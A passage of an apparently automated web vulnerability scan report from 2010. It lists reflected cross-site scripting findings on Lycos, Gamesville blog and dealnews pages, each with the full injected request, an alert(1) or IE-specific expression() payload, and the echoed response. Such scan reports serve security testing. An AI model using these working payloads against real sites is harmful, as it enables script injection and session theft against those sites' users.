Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; PENTA=174.121.222.18.1292163893857460; __utmc=207906063; __utmb=207906063.4.10.1292163855;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Advertise@L
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi9ce66"><script>alert(1)</script>ebf8b4cdc1d&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.15. http://blog.gamesville.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc939"><script>alert(1)</script>3fc3efe8798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc939\"><script>alert(1)</script>3fc3efe8798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bc939"><script>alert(1)</script>3fc3efe8798=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/?bc939\"><script>alert(1)</script>3fc3efe8798=1"/>
...[SNIP]...

1.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e58b"><script>alert(1)</script>e67fb4e0f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e58b\"><script>alert(1)</script>e67fb4e0f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b"><script>alert(1)</script>e67fb4e0f35=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b\"><script>alert(1)</script>e67fb4e0f35=1"/>
...[SNIP]...

1.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e28c3"><script>alert(1)</script>c1dd954abbb was submitted in the REST URL parameter 3. This input was echoed as e28c3\"><script>alert(1)</script>c1dd954abbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3"><script>alert(1)</script>c1dd954abbb HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3\"><script>alert(1)</script>c1dd954abbb"/>
...[SNIP]...

1.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b54dd"><script>alert(1)</script>f9d8de1e657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b54dd\"><script>alert(1)</script>f9d8de1e657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd"><script>alert(1)</script>f9d8de1e657=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd\"><script>alert(1)</script>f9d8de1e657=1"/>
...[SNIP]...

1.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d07"><script>alert(1)</script>d04b7f19c87 was submitted in the REST URL parameter 3. This input was echoed as b2d07\"><script>alert(1)</script>d04b7f19c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07"><script>alert(1)</script>d04b7f19c87 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07\"><script>alert(1)</script>d04b7f19c87"/>
...[SNIP]...

1.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2ca"><script>alert(1)</script>f7c5056a9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d2ca\"><script>alert(1)</script>f7c5056a9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca"><script>alert(1)</script>f7c5056a9c8=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3110>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca\"><script>alert(1)</script>f7c5056a9c8=1"/>
...[SNIP]...

1.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba0d"><script>alert(1)</script>f2dc20303b2 was submitted in the REST URL parameter 3. This input was echoed as 4ba0d\"><script>alert(1)</script>f2dc20303b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d"><script>alert(1)</script>f2dc20303b2 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d\"><script>alert(1)</script>f2dc20303b2"/>
...[SNIP]...

1.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40d3"><script>alert(1)</script>221b93386cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e40d3\"><script>alert(1)</script>221b93386cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3"><script>alert(1)</script>221b93386cc=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3114>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3\"><script>alert(1)</script>221b93386cc=1"/>
...[SNIP]...

1.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb4"><script>alert(1)</script>b6c9dd0275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16eb4"><script>alert(1)</script>b6c9dd0275a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?16eb4"><script>alert(1)</script>b6c9dd0275a=1&mobile=1" rel="nofollow">
...[SNIP]...

1.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be8c4<script>alert(1)</script>c1799e733f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=bn9ub373pc8q8p5g75cf8jgjion1rvnd; expires=Sun, 09-Jan-2011 14:27:24 GMT; path=/; domain=.dealnews.com
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

1.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be84f<script>alert(1)</script>75d2f5468e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html?2,414584,1328790,eref=lycos HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=9es4l9sjbia99svl89q5o3e327nsldmu; expires=Sun, 09-Jan-2011 14:27:27 GMT; path=/; domain=.dealnews.com
Content-Length: 1075
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

1.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656f6"style="x:expression(alert(1))"bdfcf5416e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coupons?656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;656f6"style="x:expression(alert(1))"bdfcf5416e5=1">
...[SNIP]...

1.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bb70"style="x:expression(alert(1))"b6416fcc52e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals?9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals?pn=2&amp;9bb70"style="x:expression(alert(1))"b6416fcc52e=1">
...[SNIP]...

1.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff964"style="x:expression(alert(1))"467fcf726ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/automotive-238?ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;ff964"style="x:expression(alert(1))"467fcf726ca=1">
...[SNIP]...

1.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0b4"style="x:expression(alert(1))"76383e47512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/cameras-167?2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
